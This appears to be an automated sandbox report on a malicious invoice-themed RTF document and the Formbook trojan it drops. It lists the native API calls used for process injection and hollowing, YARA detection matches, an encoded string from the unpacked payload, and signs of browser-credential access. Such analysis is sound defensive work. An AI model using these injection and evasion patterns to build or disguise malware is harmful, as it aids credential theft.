            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD07AC NtCreateMutant,LdrInitializeThunk,6_2_00AD07AC
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACF9F0 NtClose,LdrInitializeThunk,6_2_00ACF9F0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_00ACFAE8
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_00ACFB68
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_00ACFDC0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD00C4 NtCreateFile,6_2_00AD00C4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD0060 NtQuerySection,6_2_00AD0060
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD0078 NtResumeThread,6_2_00AD0078
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD0048 NtProtectVirtualMemory,6_2_00AD0048
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD01D4 NtSetValueKey,6_2_00AD01D4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD010C NtOpenDirectoryObject,6_2_00AD010C
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD0C40 NtGetContextThread,6_2_00AD0C40
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD10D0 NtOpenProcessToken,6_2_00AD10D0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD1148 NtOpenThread,6_2_00AD1148
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACF8CC NtWaitForSingleObject,6_2_00ACF8CC
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACF938 NtWriteFile,6_2_00ACF938
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD1930 NtSetContextThread,6_2_00AD1930
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACF900 NtReadFile,6_2_00ACF900
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFAB8 NtQueryValueKey,6_2_00ACFAB8
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFAD0 NtAllocateVirtualMemory,6_2_00ACFAD0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFA20 NtQueryInformationFile,6_2_00ACFA20
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFA50 NtEnumerateValueKey,6_2_00ACFA50
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFBB8 NtQueryInformationToken,6_2_00ACFBB8
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFBE8 NtQueryVirtualMemory,6_2_00ACFBE8
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFB50 NtCreateKey,6_2_00ACFB50
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFC90 NtUnmapViewOfSection,6_2_00ACFC90
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFC30 NtOpenProcess,6_2_00ACFC30
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFC60 NtMapViewOfSection,6_2_00ACFC60
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFC48 NtSetInformationFile,6_2_00ACFC48
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFD8C NtDelayExecution,6_2_00ACFD8C
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AD1D80 NtSuspendThread,6_2_00AD1D80
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFD5C NtEnumerateKey,6_2_00ACFD5C
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFEA0 NtReadVirtualMemory,6_2_00ACFEA0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFED0 NtAdjustPrivilegesToken,6_2_00ACFED0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFE24 NtWriteVirtualMemory,6_2_00ACFE24
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFFB4 NtCreateSection,6_2_00ACFFB4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFFFC NtCreateProcessEx,6_2_00ACFFFC
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ACFF34 NtQueueApcThread,6_2_00ACFF34
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 5_2_00513D485_2_00513D48
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C28906_2_001C2890
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C28846_2_001C2884
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C12B06_2_001C12B0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001EE2F36_2_001EE2F3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C33D06_2_001C33D0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D7BF36_2_001D7BF3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D7BEE6_2_001D7BEE
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D143A6_2_001D143A
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D14436_2_001D1443
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C34D06_2_001C34D0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C15806_2_001C1580
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C25B36_2_001C25B3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C25C06_2_001C25C0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C25F96_2_001C25F9
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D16636_2_001D1663
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C2ED06_2_001C2ED0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CF6E36_2_001CF6E3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C27096_2_001C2709
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ADE0C66_2_00ADE0C6
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ADE2E96_2_00ADE2E9
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B863BF6_2_00B863BF
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B063DB6_2_00B063DB
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE23056_2_00AE2305
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B2A37B6_2_00B2A37B
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6443E6_2_00B6443E
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B605E36_2_00B605E3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AFC5F06_2_00AFC5F0
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B265406_2_00B26540
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE46806_2_00AE4680
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AEE6C16_2_00AEE6C1
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B2A6346_2_00B2A634
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B826226_2_00B82622
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AEC7BC6_2_00AEC7BC
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B0286D6_2_00B0286D
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AEC85C6_2_00AEC85C
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE29B26_2_00AE29B2
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B8098E6_2_00B8098E
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B749F56_2_00B749F5
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AF69FE6_2_00AF69FE
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B2C9206_2_00B2C920
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B8CBA46_2_00B8CBA4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B66BCB6_2_00B66BCB
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B82C9C6_2_00B82C9C
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6AC5E6_2_00B6AC5E
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B10D3B6_2_00B10D3B
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AECD5B6_2_00AECD5B
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B12E2F6_2_00B12E2F
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AFEE4C6_2_00AFEE4C
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B7CFB16_2_00B7CFB1
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B52FDC6_2_00B52FDC
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AF0F3F6_2_00AF0F3F
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B0D0056_2_00B0D005
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B5D06D6_2_00B5D06D
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE30406_2_00AE3040
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AF905A6_2_00AF905A
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6D13F6_2_00B6D13F
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B812386_2_00B81238
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ADF3CF6_2_00ADF3CF
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE73536_2_00AE7353
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AF14896_2_00AF1489
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B154856_2_00B15485
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B1D47D6_2_00B1D47D
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B835DA6_2_00B835DA
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00AE351F6_2_00AE351F
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6579A6_2_00B6579A
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B157C36_2_00B157C3
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B7771D6_2_00B7771D
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B7F8EE6_2_00B7F8EE
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B5F8C46_2_00B5F8C4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B659556_2_00B65955
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6394B6_2_00B6394B
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B93A836_2_00B93A83
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6DBDA6_2_00B6DBDA
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ADFBD76_2_00ADFBD7
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B07B006_2_00B07B00
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B7FDDD6_2_00B7FDDD
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B6BF146_2_00B6BF14
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00B0DF7C6_2_00B0DF7C
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD15EE7_2_05DD15EE
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD15E57_2_05DD15E5
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD7D9E7_2_05DD7D9E
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD7D997_2_05DD7D99
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DEE49E7_2_05DEE49E
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DCF88E7_2_05DCF88E
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD180E7_2_05DD180E
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 6DEAEC2F96C8A1C20698A93DDD468D5447B55AC426DC381EEF5D91B19953BB7B
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: String function: 00B23F92 appears 132 times
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: String function: 00ADE2A8 appears 60 times
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: String function: 00ADDF5C appears 137 times
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: String function: 00B2373B appears 253 times
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: String function: 00B4F970 appears 84 times
            Source: sqlite3.dll.8.drStatic PE information: Number of sections : 18 > 10
            Source: C:\Windows\SysWOW64\dfrgui.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install DirectoryJump to behavior
            Source: Beauty_Stem_Invoice.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 6.2.op33779.scr.1c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.op33779.scr.30a6390.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op33779.scr.30a6390.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 6.2.op33779.scr.1c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.op33779.scr.4030000.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op33779.scr.4030000.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op33779.scr.203f154.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 5.2.op33779.scr.2041994.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000008.00000002.628678228.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.628640163.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.628854731.00000000009D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000007.00000002.628930970.0000000005C50000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.477556208.0000000000270000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.401593026.00000000002A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.401576977.00000000001C0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.355102505.0000000004030000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
            Source: 00000008.00000002.628611973.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.401776618.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.op33779.scr.30a6390.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.op33779.scr.4030000.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
            Source: 5.2.op33779.scr.30a6390.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: 5.2.op33779.scr.4030000.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@11/15@12/7
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$auty_Stem_Invoice.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrMutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR6D14.tmpJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
